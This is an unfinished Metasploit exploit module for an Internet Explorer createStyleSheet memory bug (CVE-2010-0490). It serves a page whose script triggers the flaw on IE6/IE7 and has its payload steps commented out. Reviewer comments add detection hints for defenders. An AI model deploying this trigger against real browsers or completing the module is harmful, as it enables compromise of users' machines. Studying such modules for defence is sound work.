##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

# Browser-side module for CVE-2010-0490, with MS10-018 as the referenced vendor
# bulletin. It mixes in the framework's HTML HTTP server and answers every
# request with one generated page.
#
# Status: the module name carries "[INCOMPLETE]" and the description is still
# "TODO". As written, on_request_uri never generates or embeds a payload; the
# page only runs a short script that ends in document.createStyleSheet().
# NOTE(review): Rank is GoodRanking although the module is unfinished; confirm
# that ranking is intended before relying on it.
#
# Defensive notes: the only target entry names IE6 and IE7. The JavaScript
# identifiers and the div id are random on every request, while the literal
# strings in the page ("link1", "Loading graph...", 'CANVAS') and the
# createElement -> createStyleSheet call order are fixed, so content inspection
# should key on those rather than on identifier names.
class MetasploitModule < Msf::Exploit::Remote
	Rank = GoodRanking

	include Msf::Exploit::Remote::HttpServer::HTML

	# Builds the module metadata and passes it to the superclass.
	#
	# @param info [Hash] metadata from the caller, passed to update_info
	#   together with the values defined here
	def initialize(info = {})
		authors = [
			'Alexander Kornburst', # original discovery
			'Ivan Fratric',        # original discovery
			'jduck'                # metasploit module
		]

		references = [
			%w[CVE 2010-0490],
			%w[OSVDB 63332],
			%w[BID 39031],
			%w[MSB MS10-018]
		]

		default_options = {
			'EXITFUNC'             => 'process',
			'InitialAutoRunScript' => 'migrate -f'
		}

		payload_constraints = {
			'Space'           => 1024,
			'BadChars'        => "\x00\x09\x0a\x0d'\\",
			'StackAdjustment' => -3500
		}

		# Single catch-all entry; no per-version targets are defined.
		targets = [
			['(Automatic) IE6, IE7 on Windows NT, 2000, XP, 2003 and Vista', { 'Method' => 'automatic' }]
		]

		module_info = {
			'Name'           => '[INCOMPLETE] Internet Explorer createStyleSheet Uninitialized Memory',
			# Placeholder text; the escapes reproduce the original literal's
			# newlines and tab indentation exactly.
			'Description'    => "\n\t\t\t\tTODO\n\t\t\t",
			'License'        => MSF_LICENSE,
			'Author'         => authors,
			'Version'        => '$Revision$',
			'References'     => references,
			'DefaultOptions' => default_options,
			'Payload'        => payload_constraints,
			'Platform'       => 'win',
			'Targets'        => targets,
			'DisclosureDate' => 'Mar 30 2010',
			'DefaultTarget'  => 0
		}

		super(update_info(info, module_info))
	end

	# Answers one HTTP request with the generated HTML page.
	#
	# @param cli client connection; peerhost/peerport are read for the status
	#   line, and it is handed to send_response and handler
	# @param request the incoming request (not read by this method)
	def on_request_uri(cli, request)
		print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport} (target: #{target.name})...")

		# The payload steps were never enabled; the author's stubs are kept
		# commented out, so nothing payload-related is placed in the page.
		#return if ((p = regenerate_payload(cli)) == nil)
		#shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
		#ret  	    = Rex::Text.to_unescape([mytarget.ret].pack('V'))

		# Four random alphabetic names, each 1 to 100 characters long:
		# the div id, then the three JavaScript variable names.
		element_id, element_ref, canvas_var, sheet_var =
			Array.new(4) { rand_text_alpha(rand(100) + 1) }

		# Page text, one entry per line. The anchor/div markup on the third
		# line is malformed in the original and is reproduced unchanged.
		page_lines = [
			'<html>',
			'<body>',
			%Q|<a name="link1" <div id="#{element_id}">Loading graph...</div> >|,
			'<p>',
			'<script type="text/javascript">',
			"var #{element_ref} = document.getElementById('#{element_id}');",
			"#{element_ref}.innerHTML = '';",
			"var #{canvas_var} = document.createElement('CANVAS');",
			"var #{sheet_var} = document.createStyleSheet();",
			'</script></body></html>'
		]
		html = page_lines.map { |line| line + "\n" }.join

		# Send the page as text/html (no compression is applied here).
		headers = { 'Content-Type' => 'text/html' }
		send_response(cli, html, headers)

		# Hand the connection to the framework's payload handler.
		handler(cli)
	end

end
